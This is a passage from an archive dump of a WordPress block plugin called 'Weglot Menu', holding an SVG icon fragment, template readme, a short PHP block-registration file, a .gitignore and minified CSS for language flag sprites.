	<path fill-rule="evenodd" clip-rule="evenodd" d="M13.1629 9.00676C14.0613 8.08877 15.1601 7.64917 16.4463 7.64917C17.6781 7.65415 18.8591 8.14147 19.7361 9.00676L18.424 10.3191C17.8617 9.77606 17.2089 9.49808 16.4592 9.49808C15.7171 9.48861 15.004 9.78563 14.4879 10.3191C13.945 10.8686 13.6735 11.528 13.6735 12.2908C13.6616 13.0323 13.9563 13.7457 14.4879 14.2626C15.1252 14.9082 16.0385 15.2003 16.9321 15.0442C17.8257 14.8881 18.5861 14.3038 18.967 13.4803H16.3558V11.7284H21.0546C21.2285 13.1474 20.7371 14.5672 19.7232 15.5749C18.8118 16.48 17.7131 16.939 16.4398 16.939C15.2057 16.9581 14.019 16.4641 13.1629 15.5749C12.2895 14.7137 11.8376 13.6744 11.8015 12.4513L9.9843 17.0943L8.26446 12.529L6.58987 17.0943L2.91095 7.71111H4.89589L6.58987 12.0563L8.29032 7.71111L9.9843 12.0563L11.6718 7.71111H13.6568L13.1415 9.02764C13.1486 9.02066 13.1557 9.0137 13.1629 9.00676Z" fill="white"/>
</svg>

export default icons;
weglot-menu/readme.txt000064400000003500151330373270011007 0ustar00=== Weglot Menu ===
Contributors:      The WordPress Contributors
Tags:              block
Tested up to:      5.9
Stable tag:        0.1.0
License:           GPL-2.0-or-later
License URI:       https://www.gnu.org/licenses/gpl-2.0.html

Example block written with ESNext standard and JSX support – build step required.

== Description ==

This is the long description. No limit, and you can use Markdown (as well as in the following sections).

For backwards compatibility, if this section is missing, the full length of the short description will be used, and
Markdown parsed.

== Installation ==

This section describes how to install the plugin and get it working.

e.g.

1. Upload the plugin files to the `/wp-content/plugins/weglot-menu` directory, or install the plugin through the WordPress plugins screen directly.
1. Activate the plugin through the 'Plugins' screen in WordPress


== Frequently Asked Questions ==

= A question that someone might have =

An answer to that question.

= What about foo bar? =

Answer to foo bar dilemma.

== Screenshots ==

1. This screen shot description corresponds to screenshot-1.(png|jpg|jpeg|gif). Note that the screenshot is taken from
the /assets directory or the directory that contains the stable readme.txt (tags or trunk). Screenshots in the /assets
directory take precedence. For example, `/assets/screenshot-1.png` would win over `/tags/4.3/screenshot-1.png`
(or jpg, jpeg, gif).
2. This is the second screen shot

== Changelog ==

= 0.1.0 =
* Release

== Arbitrary section ==

You may provide arbitrary sections, in the same format as the ones above. This may be of use for extremely complicated
plugins where more information needs to be conveyed that doesn't fit into the categories of "description" or
"installation." Arbitrary sections will be shown below the built-in sections outlined above.
weglot-menu/weglot-menu.php000064400000001625151330373270011773 0ustar00<?php
/**
 * Plugin Name:       Weglot Menu
 * Description:       Example block written with ESNext standard and JSX support – build step required.
 * Requires at least: 5.8
 * Requires PHP:      7.0
 * Version:           0.1.0
 * Author:            The WordPress Contributors
 * License:           GPL-2.0-or-later
 * License URI:       https://www.gnu.org/licenses/gpl-2.0.html
 * Text Domain:       weglot-menu
 *
 * @package           create-block
 */

/**
 * Registers the block using the metadata loaded from the `block.json` file.
 * Behind the scenes, it registers also all assets so they can be enqueued
 * through the block editor in the corresponding context.
 *
 * @see https://developer.wordpress.org/reference/functions/register_block_type/
 */
function create_block_weglot_menu_block_init() {
	register_block_type( __DIR__ . '/build' );
}
add_action( 'init', 'create_block_weglot_menu_block_init' );
weglot-menu/.gitignore000064400000000657151330373270011013 0ustar00# Logs
logs
*.log
npm-debug.log*
yarn-debug.log*
yarn-error.log*

# Coverage directory used by tools like istanbul
coverage

# Compiled binary addons (https://nodejs.org/api/addons.html)
build/Release

# Dependency directories
node_modules/

# Optional npm cache directory
.npm

# Optional eslint cache
.eslintcache

# Output of `npm pack`
*.tgz

# Output of `wp-scripts plugin-zip`
*.zip

# dotenv environment variables file
.env
weglot-menu/build/index.css000064400000145643151330373270011750 0ustar00.weglot-flags.hw>a:before,.weglot-flags.hw>span:before{background-position:-3570px 0!important}.weglot-flags.af>a:before,.weglot-flags.af>span:before{background-position:-6570px 0!important}.weglot-flags.fl>a:before,.weglot-flags.fl>span:before{background-position:-3060px 0!important}.weglot-flags.sq>a:before,.weglot-flags.sq>span:before{background-position:-2580px 0!important}.weglot-flags.am>a:before,.weglot-flags.am>span:before{background-position:-5130px 0!important}.weglot-flags.ar>a:before,.weglot-flags.ar>span:before{background-position:-510px 0!important}.weglot-flags.hy>a:before,.weglot-flags.hy>span:before{background-position:-1800px 0!important}.weglot-flags.az>a:before,.weglot-flags.az>span:before{background-position:-6840px 0!important}.weglot-flags.ba>a:before,.weglot-flags.ba>span:before{background-position:-2040px 0!important}.weglot-flags.eu>a:before,.weglot-flags.eu>span:before{background-position:-7260px 0!important}.weglot-flags.be>a:before,.weglot-flags.be>span:before{background-position:-5310px 0!important}.weglot-flags.bn>a:before,.weglot-flags.bn>span:before{background-position:-5400px 0!important}.weglot-flags.bs>a:before,.weglot-flags.bs>span:before{background-position:-6390px 0!important}.weglot-flags.bg>a:before,.weglot-flags.bg>span:before{background-position:-2730px 0!important}.weglot-flags.br>a:before,.weglot-flags.br>span:before{background-position:-6630px 0!important}.weglot-flags.my>a:before,.weglot-flags.my>span:before{background-position:-3299px 0!important}.weglot-flags.ca>a:before,.weglot-flags.ca>span:before{background-position:-7230px 0!important}.weglot-flags.zh>a:before,.weglot-flags.zh>span:before{background-position:-3690px 0!important}.weglot-flags.tw>a:before,.weglot-flags.tw>span:before{background-position:-2970px 0!important}.weglot-flags.km>a:before,.weglot-flags.km>span:before{background-position:-6930px 0!important}.weglot-flags.ny>a:before,.weglot-flags.ny>span:before{background-position:-1140px 0!important}.weglot-flags.co>a:before,.weglot-flags.co>span:before{background-position:-2520px 0!important}.weglot-flags.hr>a:before,.weglot-flags.hr>span:before{background-position:-5910px 0!important}.weglot-flags.cs>a:before,.weglot-flags.cs>span:before{background-position:-2700px 0!important}.weglot-flags.da>a:before,.weglot-flags.da>span:before{background-position:-2670px 0!important}.weglot-flags.nl>a:before,.weglot-flags.nl>span:before{background-position:-2100px 0!important}.weglot-flags.en>a:before,.weglot-flags.en>span:before,.weglot-flags.eo>a:before,.weglot-flags.eo>span:before{background-position:-1920px 0!important}.weglot-flags.et>a:before,.weglot-flags.et>span:before{background-position:-2640px 0!important}.weglot-flags.fj>a:before,.weglot-flags.fj>span:before{background-position:-1710px 0!important}.weglot-flags.fi>a:before,.weglot-flags.fi>span:before{background-position:-2550px 0!important}.weglot-flags.fr>a:before,.weglot-flags.fr>span:before{background-position:-2520px 0!important}.weglot-flags.gl>a:before,.weglot-flags.gl>span:before{background-position:-7290px 0!important}.weglot-flags.ka>a:before,.weglot-flags.ka>span:before{background-position:-5040px 0!important}.weglot-flags.de>a:before,.weglot-flags.de>span:before{background-position:-2490px 0!important}.weglot-flags.el>a:before,.weglot-flags.el>span:before{background-position:-2460px 0!important}.weglot-flags.gu>a:before,.weglot-flags.gu>span:before{background-position:-1170px 0!important}.weglot-flags.ht>a:before,.weglot-flags.ht>span:before{background-position:-4650px 0!important}.weglot-flags.ha>a:before,.weglot-flags.ha>span:before{background-position:-900px 0!important}.weglot-flags.he>a:before,.weglot-flags.he>span:before{background-position:-1050px 0!important}.weglot-flags.hi>a:before,.weglot-flags.hi>span:before{background-position:-1170px 0!important}.weglot-flags.hu>a:before,.weglot-flags.hu>span:before{background-position:-2430px 0!important}.weglot-flags.is>a:before,.weglot-flags.is>span:before{background-position:-2400px 0!important}.weglot-flags.ig>a:before,.weglot-flags.ig>span:before{background-position:-870px 0!important}.weglot-flags.id>a:before,.weglot-flags.id>span:before{background-position:-3510px 0!important}.weglot-flags.ga>a:before,.weglot-flags.ga>span:before{background-position:-2340px 0!important}.weglot-flags.it>a:before,.weglot-flags.it>span:before{background-position:-2310px 0!important}.weglot-flags.ja>a:before,.weglot-flags.ja>span:before{background-position:-3480px 0!important}.weglot-flags.jv>a:before,.weglot-flags.jv>span:before{background-position:-3360px 0!important}.weglot-flags.kn>a:before,.weglot-flags.kn>span:before{background-position:-1170px 0!important}.weglot-flags.kk>a:before,.weglot-flags.kk>span:before{background-position:-3150px 0!important}.weglot-flags.ko>a:before,.weglot-flags.ko>span:before{background-position:-6990px 0!important}.weglot-flags.ku>a:before,.weglot-flags.ku>span:before{background-position:-2430px 0!important}.weglot-flags.ky>a:before,.weglot-flags.ky>span:before{background-position:-3420px 0!important}.weglot-flags.lo>a:before,.weglot-flags.lo>span:before{background-position:-3450px 0!important}.weglot-flags.la>a:before,.weglot-flags.la>span:before{background-position:-2310px 0!important}.weglot-flags.lv>a:before,.weglot-flags.lv>span:before{background-position:-2280px 0!important}.weglot-flags.lt>a:before,.weglot-flags.lt>span:before{background-position:-2250px 0!important}.weglot-flags.lb>a:before,.weglot-flags.lb>span:before{background-position:-2220px 0!important}.weglot-flags.mk>a:before,.weglot-flags.mk>span:before{background-position:-2190px 0!important}.weglot-flags.mg>a:before,.weglot-flags.mg>span:before{background-position:-1200px 0!important}.weglot-flags.ms>a:before,.weglot-flags.ms>span:before{background-position:-3360px 0!important}.weglot-flags.ml>a:before,.weglot-flags.ml>span:before{background-position:-1170px 0!important}.weglot-flags.mt>a:before,.weglot-flags.mt>span:before{background-position:-2130px 0!important}.weglot-flags.mi>a:before,.weglot-flags.mi>span:before{background-position:-3240px 0!important}.weglot-flags.mr>a:before,.weglot-flags.mr>span:before{background-position:-1170px 0!important}.weglot-flags.mn>a:before,.weglot-flags.mn>span:before{background-position:-6000px 0!important}.weglot-flags.ne>a:before,.weglot-flags.ne>span:before{background-position:-3270px 0!important}.weglot-flags.no>a:before,.weglot-flags.no>span:before{background-position:-5850px 0!important}.weglot-flags.ps>a:before,.weglot-flags.ps>span:before{background-position:-5189px 0!important}.weglot-flags.fa>a:before,.weglot-flags.fa>span:before{background-position:-6690px 0!important}.weglot-flags.pl>a:before,.weglot-flags.pl>span:before{background-position:-2160px 0!important}.weglot-flags.pt>a:before,.weglot-flags.pt>span:before{background-position:-1740px 0!important}.weglot-flags.pa>a:before,.weglot-flags.pa>span:before{background-position:-3180px 0!important}.weglot-flags.ro>a:before,.weglot-flags.ro>span:before{background-position:-2070px 0!important}.weglot-flags.ru>a:before,.weglot-flags.ru>span:before{background-position:-2040px 0!important}.weglot-flags.sm>a:before,.weglot-flags.sm>span:before{background-position:-4620px 0!important}.weglot-flags.gd>a:before,.weglot-flags.gd>span:before{background-position:-30px 0!important}.weglot-flags.sr>a:before,.weglot-flags.sr>span:before{background-position:-4290px 0!important}.weglot-flags.sn>a:before,.weglot-flags.sn>span:before{background-position:-540px 0!important}.weglot-flags.sd>a:before,.weglot-flags.sd>span:before{background-position:-3180px 0!important}.weglot-flags.si>a:before,.weglot-flags.si>span:before{background-position:-2820px 0!important}.weglot-flags.sk>a:before,.weglot-flags.sk>span:before{background-position:-6810px 0!important}.weglot-flags.sl>a:before,.weglot-flags.sl>span:before{background-position:-2010px 0!important}.weglot-flags.so>a:before,.weglot-flags.so>span:before{background-position:-4560px 0!important}.weglot-flags.st>a:before,.weglot-flags.st>span:before{background-position:-4830px 0!important}.weglot-flags.es>a:before,.weglot-flags.es>span:before{background-position:-480px 0!important}.weglot-flags.su>a:before,.weglot-flags.su>span:before{background-position:-4530px 0!important}.weglot-flags.sw>a:before,.weglot-flags.sw>span:before{background-position:-1290px 0!important}.weglot-flags.sv>a:before,.weglot-flags.sv>span:before{background-position:-1980px 0!important}.weglot-flags.tl>a:before,.weglot-flags.tl>span:before{background-position:-3060px 0!important}.weglot-flags.ty>a:before,.weglot-flags.ty>span:before{background-position:-6270px 0!important}.weglot-flags.tg>a:before,.weglot-flags.tg>span:before{background-position:-2940px 0!important}.weglot-flags.ta>a:before,.weglot-flags.ta>span:before{background-position:-1170px 0!important}.weglot-flags.tt>a:before,.weglot-flags.tt>span:before{background-position:-2040px 0!important}.weglot-flags.te>a:before,.weglot-flags.te>span:before{background-position:-1170px 0!important}.weglot-flags.th>a:before,.weglot-flags.th>span:before{background-position:-2910px 0!important}.weglot-flags.to>a:before,.weglot-flags.to>span:before{background-position:-6540px 0!important}.weglot-flags.tr>a:before,.weglot-flags.tr>span:before{background-position:-1950px 0!important}.weglot-flags.uk>a:before,.weglot-flags.uk>span:before{background-position:-1890px 0!important}.weglot-flags.ur>a:before,.weglot-flags.ur>span:before{background-position:-3180px 0!important}.weglot-flags.uz>a:before,.weglot-flags.uz>span:before{background-position:-2880px 0!important}.weglot-flags.vi>a:before,.weglot-flags.vi>span:before{background-position:-2850px 0!important}.weglot-flags.cy>a:before,.weglot-flags.cy>span:before{background-position:-6420px 0!important}.weglot-flags.fy>a:before,.weglot-flags.fy>span:before{background-position:-2100px 0!important}.weglot-flags.xh>a:before,.weglot-flags.xh>span:before{background-position:-6570px 0!important}.weglot-flags.yi>a:before,.weglot-flags.yi>span:before{background-position:-1050px 0!important}.weglot-flags.yo>a:before,.weglot-flags.yo>span:before{background-position:-870px 0!important}.weglot-flags.zu>a:before,.weglot-flags.zu>span:before{background-position:-6570px 0!important}.weglot-flags.flag-1.hw>a:before,.weglot-flags.flag-1.hw>span:before{background-position:-7840px 0!important}.weglot-flags.flag-1.fl>a:before,.weglot-flags.flag-1.fl>span:before{background-position:2560px 0!important}.weglot-flags.flag-1.af>a:before,.weglot-flags.flag-1.af>span:before{background-position:-6848px 0!important}.weglot-flags.flag-1.sq>a:before,.weglot-flags.flag-1.sq>span:before{background-position:-97px 0!important}.weglot-flags.flag-1.am>a:before,.weglot-flags.flag-1.am>span:before{background-position:-2369px 0!important}.weglot-flags.flag-1.ar>a:before,.weglot-flags.flag-1.ar>span:before{background-position:-6465px 0!important}.weglot-flags.flag-1.hy>a:before,.weglot-flags.flag-1.hy>span:before{background-position:-385px 0!important}.weglot-flags.flag-1.az>a:before,.weglot-flags.flag-1.az>span:before{background-position:-513px 0!important}.weglot-flags.flag-1.ba>a:before,.weglot-flags.flag-1.ba>span:before{background-position:-6113px 0!important}.weglot-flags.flag-1.eu>a:before,.weglot-flags.flag-1.eu>span:before{background-position:-8353px 0!important}.weglot-flags.flag-1.be>a:before,.weglot-flags.flag-1.be>span:before{background-position:-705px 0!important}.weglot-flags.flag-1.bn>a:before,.weglot-flags.flag-1.bn>span:before{background-position:-609px 0!important}.weglot-flags.flag-1.bs>a:before,.weglot-flags.flag-1.bs>span:before{background-position:-929px 0!important}.weglot-flags.flag-1.bg>a:before,.weglot-flags.flag-1.bg>span:before{background-position:-1121px 0!important}.weglot-flags.flag-1.br>a:before,.weglot-flags.flag-1.br>span:before{background-position:-993px 0!important}.weglot-flags.flag-1.my>a:before,.weglot-flags.flag-1.my>span:before{background-position:-4929px 0!important}.weglot-flags.flag-1.ca>a:before,.weglot-flags.flag-1.ca>span:before{background-position:-8321px 0!important}.weglot-flags.flag-1.zh>a:before,.weglot-flags.flag-1.zh>span:before{background-position:-1505px 0!important}.weglot-flags.flag-1.tw>a:before,.weglot-flags.flag-1.tw>span:before{background-position:-6369px 0!important}.weglot-flags.flag-1.km>a:before,.weglot-flags.flag-1.km>span:before{background-position:-1217px 0!important}.weglot-flags.flag-1.ny>a:before,.weglot-flags.flag-1.ny>span:before{background-position:-4289px 0!important}.weglot-flags.flag-1.co>a:before,.weglot-flags.flag-1.co>span:before{background-position:-2561px 0!important}.weglot-flags.flag-1.hr>a:before,.weglot-flags.flag-1.hr>span:before{background-position:-1793px 0!important}.weglot-flags.flag-1.cs>a:before,.weglot-flags.flag-1.cs>span:before{background-position:-1921px 0!important}.weglot-flags.flag-1.da>a:before,.weglot-flags.flag-1.da>span:before{background-position:-1985px 0!important}.weglot-flags.flag-1.nl>a:before,.weglot-flags.flag-1.nl>span:before{background-position:-5121px 0!important}.weglot-flags.flag-1.en>a:before,.weglot-flags.flag-1.en>span:before,.weglot-flags.flag-1.eo>a:before,.weglot-flags.flag-1.eo>span:before{background-position:-7777px 0!important}.weglot-flags.flag-1.et>a:before,.weglot-flags.flag-1.et>span:before{background-position:-2337px 0!important}.weglot-flags.flag-1.fj>a:before,.weglot-flags.flag-1.fj>span:before{background-position:-2497px 0!important}.weglot-flags.flag-1.fi>a:before,.weglot-flags.flag-1.fi>span:before{background-position:-2529px 0!important}.weglot-flags.flag-1.fr>a:before,.weglot-flags.flag-1.fr>span:before{background-position:-2561px 0!important}.weglot-flags.flag-1.gl>a:before,.weglot-flags.flag-1.gl>span:before{background-position:-8383px 0!important}.weglot-flags.flag-1.ka>a:before,.weglot-flags.flag-1.ka>span:before{background-position:-2721px 0!important}.weglot-flags.flag-1.de>a:before,.weglot-flags.flag-1.de>span:before{background-position:-2753px 0!important}.weglot-flags.flag-1.el>a:before,.weglot-flags.flag-1.el>span:before{background-position:-2881px 0!important}.weglot-flags.flag-1.gu>a:before,.weglot-flags.flag-1.gu>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.ht>a:before,.weglot-flags.flag-1.ht>span:before{background-position:-3169px 0!important}.weglot-flags.flag-1.ha>a:before,.weglot-flags.flag-1.ha>span:before{background-position:-5281px 0!important}.weglot-flags.flag-1.he>a:before,.weglot-flags.flag-1.he>span:before{background-position:-3521px 0!important}.weglot-flags.flag-1.hi>a:before,.weglot-flags.flag-1.hi>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.hu>a:before,.weglot-flags.flag-1.hu>span:before{background-position:-3265px 0!important}.weglot-flags.flag-1.is>a:before,.weglot-flags.flag-1.is>span:before{background-position:-3297px 0!important}.weglot-flags.flag-1.ig>a:before,.weglot-flags.flag-1.ig>span:before{background-position:-5313px 0!important}.weglot-flags.flag-1.id>a:before,.weglot-flags.flag-1.id>span:before{background-position:-3361px 0!important}.weglot-flags.flag-1.ga>a:before,.weglot-flags.flag-1.ga>span:before{background-position:-3457px 0!important}.weglot-flags.flag-1.it>a:before,.weglot-flags.flag-1.it>span:before{background-position:-3553px 0!important}.weglot-flags.flag-1.ja>a:before,.weglot-flags.flag-1.ja>span:before{background-position:-3617px 0!important}.weglot-flags.flag-1.jv>a:before,.weglot-flags.flag-1.jv>span:before{background-position:-4321px 0!important}.weglot-flags.flag-1.kn>a:before,.weglot-flags.flag-1.kn>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.kk>a:before,.weglot-flags.flag-1.kk>span:before{background-position:-3713px 0!important}.weglot-flags.flag-1.ko>a:before,.weglot-flags.flag-1.ko>span:before{background-position:-6913px 0!important}.weglot-flags.flag-1.ku>a:before,.weglot-flags.flag-1.ku>span:before{background-position:-3265px 0!important}.weglot-flags.flag-1.ky>a:before,.weglot-flags.flag-1.ky>span:before{background-position:-3873px 0!important}.weglot-flags.flag-1.lo>a:before,.weglot-flags.flag-1.lo>span:before{background-position:-3904px 0!important}.weglot-flags.flag-1.la>a:before,.weglot-flags.flag-1.la>span:before{background-position:-3553px 0!important}.weglot-flags.flag-1.lv>a:before,.weglot-flags.flag-1.lv>span:before{background-position:-3937px 0!important}.weglot-flags.flag-1.lt>a:before,.weglot-flags.flag-1.lt>span:before{background-position:-4129px 0!important}.weglot-flags.flag-1.lb>a:before,.weglot-flags.flag-1.lb>span:before{background-position:-4161px 0!important}.weglot-flags.flag-1.mk>a:before,.weglot-flags.flag-1.mk>span:before{background-position:-4225px 0!important}.weglot-flags.flag-1.mg>a:before,.weglot-flags.flag-1.mg>span:before{background-position:-4257px 0!important}.weglot-flags.flag-1.ms>a:before,.weglot-flags.flag-1.ms>span:before{background-position:-4321px 0!important}.weglot-flags.flag-1.ml>a:before,.weglot-flags.flag-1.ml>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.mt>a:before,.weglot-flags.flag-1.mt>span:before{background-position:-4417px 0!important}.weglot-flags.flag-1.mi>a:before,.weglot-flags.flag-1.mi>span:before{background-position:-5217px 0!important}.weglot-flags.flag-1.mr>a:before,.weglot-flags.flag-1.mr>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.mn>a:before,.weglot-flags.flag-1.mn>span:before{background-position:-4769px 0!important}.weglot-flags.flag-1.ne>a:before,.weglot-flags.flag-1.ne>span:before{background-position:-5091px 0!important}.weglot-flags.flag-1.no>a:before,.weglot-flags.flag-1.no>span:before{background-position:-5505px 0!important}.weglot-flags.flag-1.ps>a:before,.weglot-flags.flag-1.ps>span:before{background-position:-33px 0!important}.weglot-flags.flag-1.fa>a:before,.weglot-flags.flag-1.fa>span:before{background-position:-3393px 0!important}.weglot-flags.flag-1.pl>a:before,.weglot-flags.flag-1.pl>span:before{background-position:-5889px 0!important}.weglot-flags.flag-1.pt>a:before,.weglot-flags.flag-1.pt>span:before{background-position:-5921px 0!important}.weglot-flags.flag-1.pa>a:before,.weglot-flags.flag-1.pa>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.ro>a:before,.weglot-flags.flag-1.ro>span:before{background-position:-6081px 0!important}.weglot-flags.flag-1.ru>a:before,.weglot-flags.flag-1.ru>span:before{background-position:-6113px 0!important}.weglot-flags.flag-1.sm>a:before,.weglot-flags.flag-1.sm>span:before{background-position:-6369px 0!important}.weglot-flags.flag-1.gd>a:before,.weglot-flags.flag-1.gd>span:before{background-position:-6497px 0!important}.weglot-flags.flag-1.sr>a:before,.weglot-flags.flag-1.sr>span:before{background-position:-6561px 0!important}.weglot-flags.flag-1.sn>a:before,.weglot-flags.flag-1.sn>span:before{background-position:-8287px 0!important}.weglot-flags.flag-1.sd>a:before,.weglot-flags.flag-1.sd>span:before{background-position:-5601px 0!important}.weglot-flags.flag-1.si>a:before,.weglot-flags.flag-1.si>span:before{background-position:-7039px 0!important}.weglot-flags.flag-1.sk>a:before,.weglot-flags.flag-1.sk>span:before{background-position:-6689px 0!important}.weglot-flags.flag-1.sl>a:before,.weglot-flags.flag-1.sl>span:before{background-position:-6721px 0!important}.weglot-flags.flag-1.so>a:before,.weglot-flags.flag-1.so>span:before{background-position:-6785px 0!important}.weglot-flags.flag-1.st>a:before,.weglot-flags.flag-1.st>span:before{background-position:-4001px 0!important}.weglot-flags.flag-1.es>a:before,.weglot-flags.flag-1.es>span:before{background-position:-7009px 0!important}.weglot-flags.flag-1.su>a:before,.weglot-flags.flag-1.su>span:before{background-position:-7073px 0!important}.weglot-flags.flag-1.sw>a:before,.weglot-flags.flag-1.sw>span:before{background-position:-3745px 0!important}.weglot-flags.flag-1.sv>a:before,.weglot-flags.flag-1.sv>span:before{background-position:-7169px 0!important}.weglot-flags.flag-1.tl>a:before,.weglot-flags.flag-1.tl>span:before{background-position:-5823px 0!important}.weglot-flags.flag-1.ty>a:before,.weglot-flags.flag-1.ty>span:before{background-position:-2593px 0!important}.weglot-flags.flag-1.tg>a:before,.weglot-flags.flag-1.tg>span:before{background-position:-7297px 0!important}.weglot-flags.flag-1.ta>a:before,.weglot-flags.flag-1.ta>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.tt>a:before,.weglot-flags.flag-1.tt>span:before{background-position:-6113px 0!important}.weglot-flags.flag-1.te>a:before,.weglot-flags.flag-1.te>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.th>a:before,.weglot-flags.flag-1.th>span:before{background-position:-7361px 0!important}.weglot-flags.flag-1.to>a:before,.weglot-flags.flag-1.to>span:before{background-position:-7456px 0!important}.weglot-flags.flag-1.tr>a:before,.weglot-flags.flag-1.tr>span:before{background-position:-7553px 0!important}.weglot-flags.flag-1.uk>a:before,.weglot-flags.flag-1.uk>span:before{background-position:-7713px 0!important}.weglot-flags.flag-1.ur>a:before,.weglot-flags.flag-1.ur>span:before{background-position:-5600px 0!important}.weglot-flags.flag-1.uz>a:before,.weglot-flags.flag-1.uz>span:before{background-position:-7969px 0!important}.weglot-flags.flag-1.vi>a:before,.weglot-flags.flag-1.vi>span:before{background-position:-8097px 0!important}.weglot-flags.flag-1.cy>a:before,.weglot-flags.flag-1.cy>span:before{background-position:-8129px 0!important}.weglot-flags.flag-1.fy>a:before,.weglot-flags.flag-1.fy>span:before{background-position:-5121px 0!important}.weglot-flags.flag-1.xh>a:before,.weglot-flags.flag-1.xh>span:before{background-position:-6848px 0!important}.weglot-flags.flag-1.yi>a:before,.weglot-flags.flag-1.yi>span:before{background-position:-3521px 0!important}.weglot-flags.flag-1.yo>a:before,.weglot-flags.flag-1.yo>span:before{background-position:-5313px 0!important}.weglot-flags.flag-1.zu>a:before,.weglot-flags.flag-1.zu>span:before{background-position:-6848px 0!important}.weglot-flags.flag-2.hw>a:before,.weglot-flags.flag-2.hw>span:before{background-position:-5448px 0!important}.weglot-flags.flag-2.fl>a:before,.weglot-flags.flag-2.fl>span:before{background-position:-1008px 0!important}.weglot-flags.flag-2.af>a:before,.weglot-flags.flag-2.af>span:before{background-position:-4968px 0!important}.weglot-flags.flag-2.sq>a:before,.weglot-flags.flag-2.sq>span:before{background-position:-2976px 0!important}.weglot-flags.flag-2.am>a:before,.weglot-flags.flag-2.am>span:before{background-position:-3816px 0!important}.weglot-flags.flag-2.ar>a:before,.weglot-flags.flag-2.ar>span:before{background-position:-768px 0!important}.weglot-flags.flag-2.hy>a:before,.weglot-flags.flag-2.hy>span:before{background-position:0 0!important}.weglot-flags.flag-2.az>a:before,.weglot-flags.flag-2.az>span:before{background-position:-5136px 0!important}.weglot-flags.flag-2.ba>a:before,.weglot-flags.flag-2.ba>span:before{background-position:-936px 0!important}.weglot-flags.flag-2.eu>a:before,.weglot-flags.flag-2.eu>span:before{background-position:-5376px 0!important}.weglot-flags.flag-2.be>a:before,.weglot-flags.flag-2.be>span:before{background-position:-4224px 0!important}.weglot-flags.flag-2.bn>a:before,.weglot-flags.flag-2.bn>span:before{background-position:-4056px 0!important}.weglot-flags.flag-2.bs>a:before,.weglot-flags.flag-2.bs>span:before{background-position:-3984px 0!important}.weglot-flags.flag-2.bg>a:before,.weglot-flags.flag-2.bg>span:before{background-position:-5040px 0!important}.weglot-flags.flag-2.br>a:before,.weglot-flags.flag-2.br>span:before{background-position:-2784px 0!important}.weglot-flags.flag-2.my>a:before,.weglot-flags.flag-2.my>span:before{background-position:-1248px 0!important}.weglot-flags.flag-2.ca>a:before,.weglot-flags.flag-2.ca>span:before{background-position:-5352px 0!important}.weglot-flags.flag-2.zh>a:before,.weglot-flags.flag-2.zh>span:before{background-position:-2592px 0!important}.weglot-flags.flag-2.tw>a:before,.weglot-flags.flag-2.tw>span:before{background-position:-3408px 0!important}.weglot-flags.flag-2.km>a:before,.weglot-flags.flag-2.km>span:before{background-position:-5160px 0!important}.weglot-flags.flag-2.ny>a:before,.weglot-flags.flag-2.ny>span:before{background-position:-1392px 0!important}.weglot-flags.flag-2.co>a:before,.weglot-flags.flag-2.co>span:before{background-position:-2304px 0!important}.weglot-flags.flag-2.hr>a:before,.weglot-flags.flag-2.hr>span:before{background-position:-4416px 0!important}.weglot-flags.flag-2.cs>a:before,.weglot-flags.flag-2.cs>span:before{background-position:-2472px 0!important}.weglot-flags.flag-2.da>a:before,.weglot-flags.flag-2.da>span:before{background-position:-2448px 0!important}.weglot-flags.flag-2.nl>a:before,.weglot-flags.flag-2.nl>span:before{background-position:-1296px 0!important}.weglot-flags.flag-2.en>a:before,.weglot-flags.flag-2.en>span:before,.weglot-flags.flag-2.eo>a:before,.weglot-flags.flag-2.eo>span:before{background-position:-312px 0!important}.weglot-flags.flag-2.et>a:before,.weglot-flags.flag-2.et>span:before{background-position:-2424px 0!important}.weglot-flags.flag-2.fj>a:before,.weglot-flags.flag-2.fj>span:before{background-position:-576px 0!important}.weglot-flags.flag-2.fi>a:before,.weglot-flags.flag-2.fi>span:before{background-position:-2328px 0!important}.weglot-flags.flag-2.fr>a:before,.weglot-flags.flag-2.fr>span:before{background-position:-2304px 0!important}.weglot-flags.flag-2.gl>a:before,.weglot-flags.flag-2.gl>span:before{background-position:-5400px 0!important}.weglot-flags.flag-2.ka>a:before,.weglot-flags.flag-2.ka>span:before{background-position:-3744px 0!important}.weglot-flags.flag-2.de>a:before,.weglot-flags.flag-2.de>span:before{background-position:-2256px 0!important}.weglot-flags.flag-2.el>a:before,.weglot-flags.flag-2.el>span:before{background-position:-2208px 0!important}.weglot-flags.flag-2.gu>a:before,.weglot-flags.flag-2.gu>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.ht>a:before,.weglot-flags.flag-2.ht>span:before{background-position:-3528px 0!important}.weglot-flags.flag-2.ha>a:before,.weglot-flags.flag-2.ha>span:before{background-position:-1176px 0!important}.weglot-flags.flag-2.he>a:before,.weglot-flags.flag-2.he>span:before{background-position:-1992px 0!important}.weglot-flags.flag-2.hi>a:before,.weglot-flags.flag-2.hi>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.hu>a:before,.weglot-flags.flag-2.hu>span:before{background-position:-2088px 0!important}.weglot-flags.flag-2.is>a:before,.weglot-flags.flag-2.is>span:before{background-position:-2064px 0!important}.weglot-flags.flag-2.ig>a:before,.weglot-flags.flag-2.ig>span:before{background-position:-1103px 0!important}.weglot-flags.flag-2.id>a:before,.weglot-flags.flag-2.id>span:before{background-position:-2040px 0!important}.weglot-flags.flag-2.ga>a:before,.weglot-flags.flag-2.ga>span:before{background-position:-2016px 0!important}.weglot-flags.flag-2.it>a:before,.weglot-flags.flag-2.it>span:before{background-position:-1968px 0!important}.weglot-flags.flag-2.ja>a:before,.weglot-flags.flag-2.ja>span:before{background-position:-1920px 0!important}.weglot-flags.flag-2.jv>a:before,.weglot-flags.flag-2.jv>span:before{background-position:-1536px 0!important}.weglot-flags.flag-2.kn>a:before,.weglot-flags.flag-2.kn>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.kk>a:before,.weglot-flags.flag-2.kk>span:before{background-position:-1704px 0!important}.weglot-flags.flag-2.ko>a:before,.weglot-flags.flag-2.ko>span:before{background-position:-1848px 0!important}.weglot-flags.flag-2.ku>a:before,.weglot-flags.flag-2.ku>span:before{background-position:-2088px 